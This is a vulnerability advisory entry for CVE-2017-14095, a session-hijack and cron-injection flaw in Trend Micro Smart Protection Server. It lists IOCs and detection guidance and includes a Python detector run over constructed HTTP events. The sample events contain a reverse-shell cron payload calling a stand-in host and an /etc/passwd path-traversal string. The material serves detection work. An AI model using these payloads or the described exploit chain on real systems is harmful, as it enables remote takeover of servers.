CVE-2017-14095
published 2018-01-19


Priority: P2 (62) · Severity: high · CVSS 3.0 base score: 8.1
Vector: AV:N / AC:H / PR:N / UI:N / S:U / C:H / I:H / A:H
Exploit: available
EPSS: 12.48% (95.7th percentile)
A vulnerability in Trend Micro Smart Protection Server (Standalone) versions 3.2 and below could allow an attacker to perform remote command execution via a local file inclusion on a vulnerable system.

Affected (2 ranges)

Vendor        Product                               Version range   Fixed in
trend_micro   trend_micro_smart_protection_server   (not given)     (none listed)
trendmicro    smart_protection_server               <= 3.2          (none listed)

Detection & IOCs (extracted from sources)

path: /widget/repository/log/diagnostic.log
path: /var/www/AdminUI/widget/inc/class/common/db/GenericDao.php
path: /var/spool/cron/webserv
path: /var/www/AdminUI/php/admin_update_program.php
path: /var/www/AdminUI/php/inc/crontab.php
path: /widget/inc/widget_package_manager.php
url: https://<host>:<port>/widget/repository/log/diagnostic.log
url: https://<host>:<port>/php/admin_update_program.php?sid=<session_id>
command: hidTimingMin: * * * * * <command> #
port: 4343
  • Monitor unauthenticated HTTP GET requests to /widget/repository/log/diagnostic.log — attackers use this to harvest active session IDs without credentials.
  • Detect POST requests to /php/admin_update_program.php where the hidTimingMin parameter contains cron-injection patterns (e.g., multiple asterisks followed by a shell command and a '#' comment terminator).
  • Alert on modifications to /var/spool/cron/webserv, especially entries injected via the web application process (webserv user), as this is the cron file written by the vulnerable admin_update_program.php script.
  • Detect HTTP requests to /widget/inc/widget_package_manager.php with user-supplied path traversal or LFI payloads in parameters; the script appends 'PoolManager.php' to user input passed to require_once.
  • Look for the string 'MSG_UPDATE_UPDATE_SCHEDULE' in HTTP responses to POST requests targeting admin_update_program.php — its presence confirms successful cron job injection by the exploit.
  • Detect outbound reverse shell connections from the web server process (webserv) to external IPs over arbitrary high ports, consistent with 'bash -i >& /dev/tcp/<attacker>/<port> 0>&1' payloads.
  • The LFI vulnerability (CVE-2017-14095) in widget_package_manager.php has a restriction: the application appends 'PoolManager.php' to the attacker-supplied filename, which must be accounted for in any exploit or detection signature.
  • The cron injection and session hijacking exploits chain together: the attacker first harvests a session token from the unauthenticated log endpoint, then uses it to authenticate the POST to admin_update_program.php. Detection must account for this two-step chain.
  • Affected version confirmed in testing is Trend Micro Smart Protection Server 3.2 (Build 1085); other versions may also be affected but were not tested.
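The detection bullets above, turned into runnable logic over a constructed stream of HTTP events. This is an added example and is not code from the advisory, the exploit, or Trend Micro. The paths, the hidTimingMin parameter, the MSG_UPDATE_UPDATE_SCHEDULE marker and port 4343 come from the IOC list; the event shape (src, method, url, body, response), the form encoding of the POST body, the sample host, and the parameter name 'pkg' in the LFI sample are assumptions. The scan() function also implements the two-step chain caveat: a source that reads diagnostic.log and later POSTs to admin_update_program.php with a sid is flagged even when the POST body looks benign.

```python
"""Detection logic for the CVE-2017-14095 exploit chain over constructed HTTP events.

Added example, not from the advisory or from Trend Micro. Event shape, body
encoding, host name and the 'pkg' parameter are assumptions; paths, the
hidTimingMin parameter, the success marker and port 4343 come from the IOCs.
"""
import re
from urllib.parse import parse_qs, unquote, urlencode, urlsplit

LOG_PATH = "/widget/repository/log/diagnostic.log"     # unauthenticated session-id leak
CRON_PATH = "/php/admin_update_program.php"            # writes /var/spool/cron/webserv
LFI_PATH = "/widget/inc/widget_package_manager.php"    # require_once(<input> . 'PoolManager.php')
SUCCESS_MARKER = "MSG_UPDATE_UPDATE_SCHEDULE"

# What the scheduler form would legitimately send as a minute field: "*", "30", "*/15", "0,30".
LEGIT_MINUTE = re.compile(r"^\s*(?:\*|\*/\d{1,2}|\d{1,2}(?:,\d{1,2})*)\s*$")
# Injected value: five cron fields followed by a command. The exploit appends '#'
# so that whatever crontab.php writes after the minute field becomes a comment.
CRON_INJECT = re.compile(r"^\s*(?:[*\d,/-]+\s+){5}\S.*$")
# Traversal or null-byte tricks aimed at the sink that appends 'PoolManager.php'.
LFI_PAYLOAD = re.compile(r"\.\./|\.\.\\|%00|\x00")


def params_of(event):
    """Return (split url, merged query-string + urlencoded-body parameters)."""
    url = urlsplit(event["url"])
    merged = parse_qs(url.query, keep_blank_values=True)
    for name, values in parse_qs(event.get("body", ""), keep_blank_values=True).items():
        merged.setdefault(name, []).extend(values)
    return url, merged


def detect(event):
    """Per-event checks; returns the list of detection names that fire."""
    url, params = params_of(event)
    hits = []
    if event["method"] == "GET" and url.path == LOG_PATH:
        # The log is readable without a session on vulnerable builds, so any
        # read outside the admin workflow is treated as a session-harvest attempt.
        hits.append("session_harvest_diagnostic_log")
    if event["method"] == "POST" and url.path == CRON_PATH:
        for value in params.get("hidTimingMin", []):
            if CRON_INJECT.match(value):
                hits.append("cron_injection_hidTimingMin")
            elif not LEGIT_MINUTE.match(value):
                hits.append("anomalous_hidTimingMin")
        if "cron_injection_hidTimingMin" in hits and SUCCESS_MARKER in event.get("response", ""):
            hits.append("cron_injection_confirmed")   # server accepted the schedule
    if url.path == LFI_PATH:
        for name, values in params.items():
            if any(LFI_PAYLOAD.search(unquote(v)) for v in values):
                hits.append("lfi_attempt:" + name)
    return hits


def scan(events):
    """Run detect() over an ordered event stream and add the two-step chain check.

    Returns {event index: hits}. A source that read diagnostic.log earlier and
    then POSTs to admin_update_program.php with a sid is flagged as a hijack.
    """
    results = {}
    harvested = set()   # sources that fetched the log earlier in the stream
    for i, ev in enumerate(events):
        hits = detect(ev)
        url, params = params_of(ev)
        if "session_harvest_diagnostic_log" in hits:
            harvested.add(ev["src"])
        elif (ev["method"] == "POST" and url.path == CRON_PATH
              and ev["src"] in harvested and "sid" in params):
            hits.append("session_hijack_chain")
        if hits:
            results[i] = hits
    return results


BASE = "https://sps.example.internal:4343"   # constructed host; 4343 is the admin UI port
REVERSE_SHELL = "* * * * * bash -i >& /dev/tcp/203.0.113.5/4444 0>&1 #"

# Constructed sample events, not real captures. Response bodies are reduced to
# the marker string; the real response format is not shown in the advisory.
SAMPLE_EVENTS = [
    {"src": "203.0.113.5", "method": "GET", "url": BASE + LOG_PATH, "body": "", "response": ""},
    {"src": "203.0.113.5", "method": "POST", "url": BASE + CRON_PATH + "?sid=deadbeef",
     "body": urlencode({"hidTimingMin": REVERSE_SHELL}), "response": SUCCESS_MARKER},
    {"src": "10.0.0.20", "method": "POST", "url": BASE + CRON_PATH + "?sid=cafe",
     "body": urlencode({"hidTimingMin": "30"}), "response": SUCCESS_MARKER},
    {"src": "203.0.113.5", "method": "GET", "body": "", "response": "",
     "url": BASE + LFI_PATH + "?pkg=../../../../etc/passwd%00"},   # 'pkg' is assumed
    {"src": "10.0.0.20", "method": "GET", "url": BASE + "/php/index.php", "body": "", "response": ""},
]

if __name__ == "__main__":
    for idx, hits in sorted(scan(SAMPLE_EVENTS).items()):
        ev = SAMPLE_EVENTS[idx]
        print(f"event {idx} {ev['src']} {ev['method']} {ev['url']}: {', '.join(hits)}")
```

The legitimate admin POST (event 2) produces no hit even though its response carries the success marker, because the marker alone only confirms that a schedule was saved; it becomes evidence only next to an injected hidTimingMin or a source that harvested a session first. In a real pipeline the LFI check should scan every parameter, as here, since the advisory does not name the one passed to require_once.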

CVSS provenance

NVD, CVSS v3.0: 8.1 HIGH  CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD, CVSS v2.0: 6.8 MEDIUM  AV:N/AC:M/Au:N/C:P/I:P/A:P